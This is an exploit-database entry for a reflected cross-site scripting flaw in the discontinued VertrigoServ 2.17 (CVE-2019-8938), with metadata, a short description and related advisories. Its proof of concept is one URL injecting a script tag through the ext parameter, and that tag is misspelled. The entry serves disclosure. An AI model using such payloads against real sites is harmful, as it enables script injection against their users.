Lucene search
Rafael Pedrero1337DAY-ID-32262HistoryFeb 21, 2019 - 12:00 a.m.
VertrigoServ 2.17 Cross Site Scripting Vulnerability
2019-02-2100:00:00
Rafael Pedrero
0day.today
18
0.003 Low
EPSS
Percentile
69.3%
Exploit for php platform in category web applications
<!--
# Exploit Title: Cross Site Scripting in VertrigoServ 2.17
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://vertrigo.sf.net
# Software Link: http://vertrigo.sf.net
# Version: VertrigoServ 2.17
# Tested on: All
# CVE : CVE-2019-8938
# Category: webapps
1. Description
VertrigoServ 2.17 allows XSS via the /inc/extensions.php ext parameter.
NOTE: This product is discontinued.
2. Proof of Concept
http://127.0.0.1/inc/extensions.php?ext=<scrript>alert(1)</script>
3. Solution:
The product is discontinued. Update last version
-->
# 0day.today [2019-03-09] #Related
prion
prion
Design/Logic Flaw
2019-03-21 16:01:00
cvelist
cvelist
CVE-2019-8938
2019-03-17 18:38:49
packetstorm
packetstorm
VertrigoServ 2.17 Cross Site Scripting
2019-02-20 00:00:00
cve
cve
CVE-2019-8938
2019-03-21 16:01:15
nvd
nvd
CVE-2019-8938
2019-03-21 16:01:15